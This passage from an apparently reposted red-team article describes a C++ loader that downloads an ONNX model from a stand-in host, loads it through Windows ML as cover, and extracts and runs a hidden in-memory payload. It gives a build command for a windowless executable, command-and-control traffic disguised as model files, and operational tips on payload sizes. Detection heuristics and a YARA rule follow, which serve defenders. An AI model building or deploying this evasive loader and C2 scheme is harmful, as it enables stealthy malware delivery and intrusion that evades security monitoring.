&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WinHttpReadData(hReq, chunk.data(), avail, &rd);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; result.insert(result.end(), chunk.begin(), chunk.begin() + rd);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;while&nbsp;(avail >&nbsp;0);
&nbsp; &nbsp; }
&nbsp; &nbsp; WinHttpCloseHandle(hReq);&nbsp;WinHttpCloseHandle(hConn);&nbsp;WinHttpCloseHandle(hSess);
&nbsp; &nbsp; return&nbsp;result;
}

Main function

int&nbsp;main()&nbsp;{
&nbsp; &nbsp; CoInitializeEx(NULL, COINIT_MULTITHREADED);
&nbsp; &nbsp; try&nbsp;{ winrt::init_apartment(); }&nbsp;catch&nbsp;(...) {}

&nbsp; &nbsp; printf("[*] 正在从远程服务器获取模型...\n");
&nbsp; &nbsp; auto&nbsp;model_bytes =&nbsp;fetch_model(L"models.example.com",&nbsp;443,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;L"/v1/models/vision_classifier_v2.onnx",&nbsp;true);
&nbsp; &nbsp; if&nbsp;(model_bytes.empty())&nbsp;return&nbsp;1;
&nbsp; &nbsp; printf("[+] 已获取模型:%zu 字节\n", model_bytes.size());

&nbsp; &nbsp; printf("[*] 通过 WinML 加载模型(行为伪装)...\n");
&nbsp; &nbsp; load_model_winml(model_bytes);

&nbsp; &nbsp; printf("[*] 提取并执行载荷...\n");
&nbsp; &nbsp; extract_and_execute(model_bytes);
&nbsp; &nbsp; return&nbsp;0;
}

Build command:

cl.exe /nologo /EHsc /std:c++17 /O2 /MT ^
&nbsp; &nbsp; /D&nbsp;"WIN32"&nbsp;/D&nbsp;"NDEBUG"&nbsp;/D&nbsp;"_UNICODE"&nbsp;/D&nbsp;"UNICODE"&nbsp;^
&nbsp; &nbsp; winml_loader.cpp ^
&nbsp; &nbsp; /Fe:WindowsMLHost.exe ^
&nbsp; &nbsp; /link /SUBSYSTEM:WINDOWS /ENTRY:mainCRTStartup ^
&nbsp; &nbsp; windowsapp.lib winhttp.lib ^
&nbsp; &nbsp; /MACHINE:X64

/SUBSYSTEM:WINDOWS with /ENTRY:mainCRTStartup produces a GUI application with no console window while keeping the standard main() entry point.


Network Traffic Analysis

When the loader fetches the ONNX model, the traffic looks like this:

GET /v1/models/vision_classifier_v2.onnx HTTP/1.1
Host: models.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/120.0
Accept: application/octet-stream, application/x-protobuf

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 51283

<binary protobuf: a structurally valid ONNX model>

To a network analyst or NIDS, this resembles the traffic of any application that pulls a model from the cloud for local inference: the URL path, Content-Type, and binary body all fit the expected pattern. Because the loader requests the model over TLS, only the host name and transfer size are visible on the wire unless the traffic is decrypted.

Follow-up C2 traffic can also be wrapped as ONNX model uploads and downloads:

POST /v1/telemetry/model_metrics HTTP/1.1
Content-Type: application/octet-stream

<ONNX model carrying C2 results in metadata_props>

Tasking from the server comes back as an ONNX model, and results go up as another ONNX model, so the whole session looks like a stream of ML model files.


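Detection and Defense

Defenders can watch for the following indicators:

Static analysis

  • Import combination: WinRT activation imports (the windowsapp.lib set) together with winhttp.dll are relatively uncommon in ordinary ML applications, most of which use higher-level HTTP libraries.
  • No actual inference: a binary that loads a WinML model but never creates a LearningModelSession or calls Evaluate() is using WinML as cover.
  • Metadata entropy: metadata in legitimate ONNX models is usually low-entropy text (author name, description, and so on). Base64-encoded payloads are high-entropy, approaching the 6 bits per character that the Base64 alphabet allows, so entries in metadata_props above roughly 5.5 bits per byte deserve inspection.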
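The entropy check can be sketched in a few lines. This is a minimal illustration assuming the metadata has already been parsed into a dictionary of strings; `shannon_entropy`, `suspicious_entries`, and the `min_len` cutoff are hypothetical names and values chosen for the example, and only the 5.5 threshold comes from the text above.

```python
from __future__ import annotations

import math
from collections import Counter


def shannon_entropy(text: str) -> float:
    """Shannon entropy of a string, in bits per character."""
    if not text:
        return 0.0
    total = len(text)
    counts = Counter(text)
    return -sum(n / total * math.log2(n / total) for n in counts.values())


def suspicious_entries(metadata: dict[str, str],
                       threshold: float = 5.5,
                       min_len: int = 256) -> list[str]:
    """Return keys whose values are long and high-entropy.

    min_len is an assumed cutoff: very short strings cannot produce a
    stable entropy estimate, so they are skipped.
    """
    return [key for key, value in metadata.items()
            if len(value) >= min_len and shannon_entropy(value) > threshold]
```

The length cutoff matters in practice: a short hash or GUID in legitimate metadata can score high on entropy without carrying anything of interest, so pairing entropy with size keeps false positives down.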

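Runtime / behavioral

  • Load without inference: ETW events from the WinML provider show a model being loaded with no SessionCreated or EvaluationStart event afterwards. The article refers to the provider both as Microsoft-Windows-AI-MachineLearning and as Microsoft.AI.MachineLearning, so confirm the provider and event names on the Windows build you monitor.
  • Executable memory after a model load: VirtualAlloc followed by VirtualProtect(PAGE_EXECUTE_READ) shortly after a WinML model load is a strong signal, as is a new thread whose start address lies in that private region.
  • Model origin: a model loaded from an InMemoryRandomAccessStream rather than a file path suggests it was fetched over the network and never written to disk.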
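The "load without inference" signal amounts to a simple correlation over collected events. The sketch below assumes events have already been exported as dictionaries with `pid`, `event`, and `ts` (seconds) keys; that record shape, the `ModelLoaded` event name, and the 30-second window are assumptions made for illustration and need to be mapped onto what your telemetry pipeline actually provides.

```python
from __future__ import annotations

# Assumed event names; replace with the names your ETW provider emits.
LOAD_EVENT = "ModelLoaded"
FOLLOW_UP_EVENTS = {"SessionCreated", "EvaluationStart"}


def loads_without_inference(events: list[dict], window: float = 30.0) -> list[int]:
    """Return PIDs that loaded a model with no session or evaluation
    event from the same process within `window` seconds afterwards."""
    flagged = set()
    for ev in events:
        if ev["event"] != LOAD_EVENT:
            continue
        followed = any(
            other["pid"] == ev["pid"]
            and other["event"] in FOLLOW_UP_EVENTS
            and 0 <= other["ts"] - ev["ts"] <= window
            for other in events
        )
        if not followed:
            flagged.add(ev["pid"])
    return sorted(flagged)
```

A hit here is a lead rather than a verdict: some applications load a model at startup and evaluate it much later, so the window should be tuned against a baseline of known-good software.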

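Network

  • ONNX structure checks: where traffic can be inspected, the protobuf structure can be parsed. A model whose graph is nearly empty (a single Identity node) but whose metadata or weight tensors are large is highly suspicious.
  • High-frequency downloads: legitimate ML applications rarely download models often (typically only at install or update time). An ONNX file fetched every few seconds or minutes may indicate a C2 heartbeat.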
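The download-frequency heuristic can be expressed as a check on the gaps between model requests from one client. This is a rough sketch: `looks_like_beacon` is a hypothetical helper, and the ten-minute median interval and five-request minimum are assumed starting values, not figures from the article.

```python
from __future__ import annotations

from statistics import median


def looks_like_beacon(timestamps: list[float],
                      max_median_interval: float = 600.0,
                      min_requests: int = 5) -> bool:
    """Flag a client whose model downloads recur at short intervals.

    timestamps are request times in seconds for one client and one host.
    """
    if len(timestamps) < min_requests:
        return False
    ordered = sorted(timestamps)
    gaps = [later - earlier for earlier, later in zip(ordered, ordered[1:])]
    return median(gaps) <= max_median_interval
```

Using the median rather than the mean keeps one long pause (a laptop going to sleep, for instance) from hiding an otherwise regular short-interval pattern.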

YARA rule example

rule ONNX_Payload_Stager {
    meta:
        description = "Suspicious metadata in an ONNX model (possible payload delivery)"
    strings:
        $onnx_ir = { 08 (07|08|09) }          // ir_version field
        $identity = "Identity" ascii
        $chunk_key = /weight_hash_\d+/ ascii
        $graph_name = "model" ascii
        $input_name = "input" ascii
        $output_name = "output" ascii
    condition:
        $onnx_ir at 0 and $identity and $chunk_key and
        $graph_name and $input_name and $output_name and
        filesize < 5MB
}

操作注意事项

  • • 模型有效性:构造的模型必须通过 ONNX 验证,否则 WinML 会拒绝加载。务必用 onnx.checker.check_model() 测试。

  • • 大小限制

  • • 元数据方法:每个 StringStringEntryProto 值约可容纳 16MB(protobuf 长度限制),base64 开销约 33%。实际每个分块可承载约 12MB 原始载荷,分块数量不限。

  • • 权重张量方法:TensorProto.raw_data 没有实际大小限制。生产环境中上百 MB 的权重张量很常见。

  • • Windows 版本要求:WinML 需要 Windows 10 1809(build 17763)或更高版本。过低版本会激活失败。

  • • COM 初始化:WinML 需要 COM,如果你的加载器运行在 COM 已初始化但标志不兼容的环境中,请使用 winrt::init_apartment() 适配。


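Summary

The Windows machine learning subsystem gives red teams a capable and overlooked primitive. By embedding a payload in a valid ONNX model file, an attacker gains:

  • A plausible binary profile: the import table and most API calls match those of real ML applications
  • Network cover: ONNX protobuf traffic resembles that of ordinary model-serving infrastructure
  • In-memory model handling: WinML loads the model from a stream, so the model file never lands on disk
  • Behavioral cover: ETW telemetry shows what looks like normal ML model loading

The technique applies to Windows 10 1809 and later and needs no extra runtime dependencies. As ML inference becomes ubiquitous on endpoints, this attack surface will keep growing.

Detection is possible, but it requires defenders to analyze behavior in depth rather than stop at the surface. Organizations should audit how WinML is used, monitor for models that are loaded but never run, and check ONNX metadata for abnormal entropy.

Disclaimer: all code in this article is for authorized security research and red team exercises only. Test only in environments where you have explicit authorization.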



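Disclaimer:

The programs and techniques in this article are intended only for lawful security research and teaching, with the aim of improving defensive capability.

Any organization or individual who uses this content without authorization for attacks, sabotage, or other illegal purposes bears sole responsibility for all resulting legal liability and damages; this site accepts no joint liability.

Content on this site is published for technical exchange and knowledge sharing. For copyright or other objections, contact the site by email.

Reposted from: 老鑫安全, 《免杀新姿势:利用 Windows 机器学习(WinML)在内存中隐蔽执行恶意载荷》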